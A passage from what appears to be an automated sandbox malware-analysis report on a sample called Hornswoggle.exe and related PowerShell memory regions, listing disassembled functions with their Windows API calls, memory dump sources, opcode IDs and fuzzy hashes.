                                                        • Instruction Fuzzy Hash: D0F096D1909F60ABFB3292684C54B775B8DCB55771F18547BE540B62C2C27C48408FAA
                                                        Function 00404FF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0040501F
                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00405070
                                                          • Part of subcall function 00404094: SendMessageA.USER32(0001043A,00000000,00000000,00000000), ref: 004040A6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                        • Instruction ID: c10ccb832a2a3496aa312e1d90523b33251ee11bfabb6cbb9dcba6f20acc8f53
                                                        • Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                        • Instruction Fuzzy Hash: ED018471504609ABDF205F61EC80EAF3725EB84754F148037FB01751E2C77A8C929FAA
                                                        Function 0040591C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hornswoggle.exe,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405922
                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hornswoggle.exe,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405930
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-3370423016
                                                        • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                        • Instruction ID: 8de3941b568bd0f8b26bcb964e879cd368c776abfab0e8ce3c3ebd0dc0734e68
                                                        • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                        • Instruction Fuzzy Hash: 1CD0C7B2409D70AEE3036314DC04F9F6A48DF27715F094462E181E61A1C6BC5D814BED
                                                        Function 00405A3B Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A63
                                                        • CharNextA.USER32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A74
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                        • Instruction ID: 761e0a114986e2dc795515ee57e72db75caae44d6787476300dd9688655b7936
                                                        • Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                        • Instruction Fuzzy Hash: 2FF06232605518BFC7129FA5DC40D9EBBA8EF16350B2541B5F800F7250D674EE019FA9

                                                        Executed Functions

                                                        Function 04FBB788 Relevance: .7, Instructions: 689COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8a6ae9011de614192f38fc3494317fc3f1c31530d355be3d1499dec83d076ba0
                                                        • Instruction ID: 63fa2364d9b1a99235ba6b9a06dcd19b129ef662d32023174dda2cb62da99373
                                                        • Opcode Fuzzy Hash: 8a6ae9011de614192f38fc3494317fc3f1c31530d355be3d1499dec83d076ba0
                                                        • Instruction Fuzzy Hash: 8C528134F04219CFDB25CF66C854BAEB7B2EF86304F108099D945A7351EB74AA86CF91
                                                        Function 07AD7D58 Relevance: .7, Instructions: 679COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc74488635ec67b38d1f6218a9c73837120e3b328c474e16511966471206db44
                                                        • Instruction ID: 509ce5deff9a7d709b686418f17f6b8906fb8fbe1ff1fca795ffc66daddee3a3
                                                        • Opcode Fuzzy Hash: fc74488635ec67b38d1f6218a9c73837120e3b328c474e16511966471206db44
                                                        • Instruction Fuzzy Hash: 80526CB4B02204EFDB14DB68C554FAABBB2AFC9704F548058E9169F355CB76EC42CB81
                                                        Function 07AD7350 Relevance: .6, Instructions: 647COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 91fb8d880abe19934dcb4aae413cc869c2c4df09f3b0fd422590035bf03933c9
                                                        • Instruction ID: 9270eb3702a0076d9a2551ee3b0dc48af46d79a63889289dbb883aa15d08a532
                                                        • Opcode Fuzzy Hash: 91fb8d880abe19934dcb4aae413cc869c2c4df09f3b0fd422590035bf03933c9
                                                        • Instruction Fuzzy Hash: C6526FB4B01215DFE724DB68C850FAABBB2AF85704F14C099E9199B355CB72EC85CF81
                                                        Function 07ADD001 Relevance: .6, Instructions: 620COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: afdff069ad835ea7ff0a160a631a3370825b7fbd33cc607e4960adaa479dbb40
                                                        • Instruction ID: c5ce0596c7fcc7bbeb85d91e2edbe3b5e74599254682da37ab45abc547baa136
                                                        • Opcode Fuzzy Hash: afdff069ad835ea7ff0a160a631a3370825b7fbd33cc607e4960adaa479dbb40
                                                        • Instruction Fuzzy Hash: FC425DB4B012149FD724DB54CC90FAAB7B2AB89704F51C099E909AF355CB72ED81CF81
                                                        Function 07AD6A8C Relevance: .6, Instructions: 590COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f15c79b89eb4ec740f2f2c4c6c2e7430dedfd3676dbbd64aa5aff3ff0bd541b
                                                        • Instruction ID: 8b5fdd56b9f90736e888512af3c528b0e7d8264c415befc3500b8c4bb7133d41
                                                        • Opcode Fuzzy Hash: 8f15c79b89eb4ec740f2f2c4c6c2e7430dedfd3676dbbd64aa5aff3ff0bd541b
                                                        • Instruction Fuzzy Hash: 853281B4B012149FE714DB68C850FAABBB2EF85704F10C0A9E9499F355CB76EC858F91
                                                        Function 07AD7D35 Relevance: .6, Instructions: 572COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86d8a0e5627816623a076617c3a9a4f506414ec7cdeec37d41d0a2e54f0db2e2
                                                        • Instruction ID: b7fc7280ba7160b4b90212852372811b56dae39491cce55b93349b18cf1c72c3
                                                        • Opcode Fuzzy Hash: 86d8a0e5627816623a076617c3a9a4f506414ec7cdeec37d41d0a2e54f0db2e2
                                                        • Instruction Fuzzy Hash: 39327DB4B02204AFDB14CB58C944FA9BBB2EFC9714F148099E915AF355C776EC46CB81
                                                        Function 07ADC810 Relevance: .5, Instructions: 503COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ca7951aee472dc6fc2315aff60cb200162e536c609085b8b5ccf056dc2cb85cc
                                                        • Instruction ID: 205add0035da9c13e7d9c3e85e6ffded2568878f715c3c1e29c7c96d227fb6f8
                                                        • Opcode Fuzzy Hash: ca7951aee472dc6fc2315aff60cb200162e536c609085b8b5ccf056dc2cb85cc
                                                        • Instruction Fuzzy Hash: 97224EB4B012149FD714DB64CC50FAABBB2AF85704F518099E909AF355CB72ED81CF91
                                                        Function 07AD7464 Relevance: .5, Instructions: 484COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5fb77cf94f3d283a7fdecf5e40733797e768f4ed2d293f2b3d3e1b326203e847
                                                        • Instruction ID: d26fdfcb00a758a1afab0f00337a79dd51a73b79e284f22c2c76097cffcf0f6d
                                                        • Opcode Fuzzy Hash: 5fb77cf94f3d283a7fdecf5e40733797e768f4ed2d293f2b3d3e1b326203e847
                                                        • Instruction Fuzzy Hash: 85226EB4B012149FE724DB68C850FAABBB2EF85704F10C099E9099F355CB76ED858F91
                                                        Function 07AD45D8 Relevance: .5, Instructions: 469COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 594b6c3b6ab2a65ab272aaf3edcd5b079bd67e8dae6cb810efebd9a2ff7361b4
                                                        • Instruction ID: 86281ffd5347bbdb97268ea21cec52ccdaf6cc66327ceef550829ba5c5044a70
                                                        • Opcode Fuzzy Hash: 594b6c3b6ab2a65ab272aaf3edcd5b079bd67e8dae6cb810efebd9a2ff7361b4
                                                        • Instruction Fuzzy Hash: 07126AB4B012449FDB14CB98C494F6EBBB2AFC9714F54C069E91AAF355CB72EC418B81
                                                        Function 07ADD0F2 Relevance: .5, Instructions: 466COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11107a516bedccae750889cd2b88629923385bdbd0924e5df7eecc9cfbd3b786
                                                        • Instruction ID: 826804017e994c704bac601b51138ed24ff61d865d6c24946e6f06714e6dfce7
                                                        • Opcode Fuzzy Hash: 11107a516bedccae750889cd2b88629923385bdbd0924e5df7eecc9cfbd3b786
                                                        • Instruction Fuzzy Hash: 24124DB4B012149FD714DB54CC90FAABBB2AB89704F51C1A9E909AF345CB72ED81CF91
                                                        Function 07AD7DF4 Relevance: .5, Instructions: 461COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f90c5ae8cc24b8943b31100a8f317b657265eddda24359156ff2df4e978a244
                                                        • Instruction ID: 792d744097a23584de950ade4dc53a0bfdcb850804727188f9fd2b4b34b8bbec
                                                        • Opcode Fuzzy Hash: 8f90c5ae8cc24b8943b31100a8f317b657265eddda24359156ff2df4e978a244
                                                        • Instruction Fuzzy Hash: 3C125CB4B02204AFDB14DB58C544FA9BBB2EFC9704F148099E916AF355C776EC86CB81
                                                        Function 0928BCC0 Relevance: .4, Instructions: 426COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14ba5c4618125b9bdc895b00467de297a3c61ada8c3e1e852a40ebbb6ff5d82c
                                                        • Instruction ID: 8f00723f4887cbc70aaef68ccb0aeb36f0b7337098c48cfac373d9fa1dec5b0c
                                                        • Opcode Fuzzy Hash: 14ba5c4618125b9bdc895b00467de297a3c61ada8c3e1e852a40ebbb6ff5d82c
                                                        • Instruction Fuzzy Hash: 5C023D34A11219DFDB05DFA8D580AAEBBF2FF88310F648159E945AB391C731ED41CB90
                                                        Function 07AD45BB Relevance: .4, Instructions: 426COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 562c3e6133efd59343c3624447a7c4f21949395bc2a1fa8bbed39a6d4a803241
                                                        • Instruction ID: a50b5d6c89e4fd955458cc6afebf8fbc2ff765e24354cff19e44045266d10e8f
                                                        • Opcode Fuzzy Hash: 562c3e6133efd59343c3624447a7c4f21949395bc2a1fa8bbed39a6d4a803241
                                                        • Instruction Fuzzy Hash: 650269B4B01245DFDB14CB98C484EADBBB2EF89714F54C069E91AAB355C772EC41CB81
                                                        Function 0928CC60 Relevance: .4, Instructions: 421COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9049b72c81e8d73c562e4bbcfd109b1129a5a209b8f616255ff40c301a0a5825
                                                        • Instruction ID: 0411aefbe4e6175c2b21934147209a509d6d61ffcaf84f03539c1c2b09de1321
                                                        • Opcode Fuzzy Hash: 9049b72c81e8d73c562e4bbcfd109b1129a5a209b8f616255ff40c301a0a5825
                                                        • Instruction Fuzzy Hash: 1D023D74A112199FDB05DF98D980AAEBBF2FF88310F248159E849AB391C735ED51CB90
                                                        Function 07AD2070 Relevance: .4, Instructions: 398COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 437de5c9ee45dfd686811779b875f257615e0ac4c934c705ee61c38a5d26a16c
                                                        • Instruction ID: c19eaa1d899f3fd13b45577d657105fc3e17a03d8fda89f1092c845033c150f0
                                                        • Opcode Fuzzy Hash: 437de5c9ee45dfd686811779b875f257615e0ac4c934c705ee61c38a5d26a16c
                                                        • Instruction Fuzzy Hash: 46D139F5B00252CFCB249B6884107BABBA2BFD6611F14C06AD967CB2C1EB75CD41C792
                                                        Function 0928C288 Relevance: .4, Instructions: 392COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a8272d41e8a207aa1fe71d69e87e132438fa392e0c24fe1b7bbc5acbb916f6c
                                                        • Instruction ID: 3170c8368844a0b090f286835950aa2b99031545d630295802b96349625ac050
                                                        • Opcode Fuzzy Hash: 5a8272d41e8a207aa1fe71d69e87e132438fa392e0c24fe1b7bbc5acbb916f6c
                                                        • Instruction Fuzzy Hash: C9F12C74A11219DFDB05DF98D580AAEBBF2FF48310F248159E845AB391C735EC82CBA0
                                                        Function 0928B3A8 Relevance: .4, Instructions: 377COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c68c6a68fb02e97623125420e6a8f4cdcddf3282e57be6ba5624f6cc2a7d3315
                                                        • Instruction ID: e4de0e629b0ef2807470e41792e79bb69e57a25cc0fa93137e38950178ddd5e4
                                                        • Opcode Fuzzy Hash: c68c6a68fb02e97623125420e6a8f4cdcddf3282e57be6ba5624f6cc2a7d3315
                                                        • Instruction Fuzzy Hash: 16F13C74A112199FDB15DFA8D990A9EFBF2FF88310F248159E805AB391C735ED81CB90
                                                        Function 098117B8 Relevance: .4, Instructions: 376COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291769093.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c31eac136e264324940f915188a8bd1b3f69ef2da6831419c581a80ed72e376
                                                        • Instruction ID: f937e63f7d257188595655d58a6fee07035cc92ee6d1d97503474c9e011882d2
                                                        • Opcode Fuzzy Hash: 5c31eac136e264324940f915188a8bd1b3f69ef2da6831419c581a80ed72e376
                                                        • Instruction Fuzzy Hash: 88E1A135B05218DFCB14CB68C454AAABBF6AF98314F14C0AEEA09DB355CB71DC81CB91
                                                        Function 07AD7700 Relevance: .4, Instructions: 373COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 88843359cc7ded0e81b91de1e2194568748b7ea5361c5a4f82406516828832fe
                                                        • Instruction ID: 8a6f24f9c3069b17621611de628e6a91936546c15d4f1c04d4d466e8ba188475
                                                        • Opcode Fuzzy Hash: 88843359cc7ded0e81b91de1e2194568748b7ea5361c5a4f82406516828832fe
                                                        • Instruction Fuzzy Hash: D0E1BFB0B012159FDB18DBA4C451BAEBBB2AFC5714F14C029E816AF354CB75EC81CB95
                                                        Function 07ADD53A Relevance: .3, Instructions: 333COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 95d50a30aecacfa1e01d382ccc2bd767be00b3c662b3d016429871e7d28f86e9
                                                        • Instruction ID: b8e2d8904ba9008a754f8707808242cfd2265a9f619f6bff93fbf85e749a8814
                                                        • Opcode Fuzzy Hash: 95d50a30aecacfa1e01d382ccc2bd767be00b3c662b3d016429871e7d28f86e9
                                                        • Instruction Fuzzy Hash: FEE17CB4B00229DFDB24CB64C854BAAB7B2AF85704F508199D919AF745CB32ED85CF81
                                                        Function 07AD76DE Relevance: .3, Instructions: 320COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41e7737a0a48727a003d0ee4bc9c1a84f22e3c00122e614737459ba1d177ffa5
                                                        • Instruction ID: eb65f88ac84bf707fac38f6c620b2beb70a5415f9ad394202c20c1677215829c
                                                        • Opcode Fuzzy Hash: 41e7737a0a48727a003d0ee4bc9c1a84f22e3c00122e614737459ba1d177ffa5
                                                        • Instruction Fuzzy Hash: 21C1CFB4B002159FCB18DB64C840BADBBB2AFC9714F14C069E816AF355CB36EC85CB95
                                                        Function 07AD8B70 Relevance: .2, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1dc8a750fce7f521b5268666e71b8ba6423a3ba83a37c03e594e2d16d9af696b
                                                        • Instruction ID: 8d06fd0bb5b23564125d27ba31d0573c010256fec79d9de1abafac0d3f06199a
                                                        • Opcode Fuzzy Hash: 1dc8a750fce7f521b5268666e71b8ba6423a3ba83a37c03e594e2d16d9af696b
                                                        • Instruction Fuzzy Hash: 607149B5B01306DFCB249B6988117BABBB1AFD5211F14807AD9A7DB280DB39CD41C7A1
                                                        Function 04FB9010 Relevance: .1, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c72b923a6949a1c0bb89fc0679bb47c58e2226ffe133be81502ef214c319fc16
                                                        • Instruction ID: b8b5bf02c790afbd51e7b2d334ea550e231a5c0c133126fd0e8134fc93ab14a0
                                                        • Opcode Fuzzy Hash: c72b923a6949a1c0bb89fc0679bb47c58e2226ffe133be81502ef214c319fc16
                                                        • Instruction Fuzzy Hash: 3E41A734B012049FDB05DFB9C454BAEBBF3AFC5310F14C069D845AB795CA759C428BA1
                                                        Function 0928CC11 Relevance: .1, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
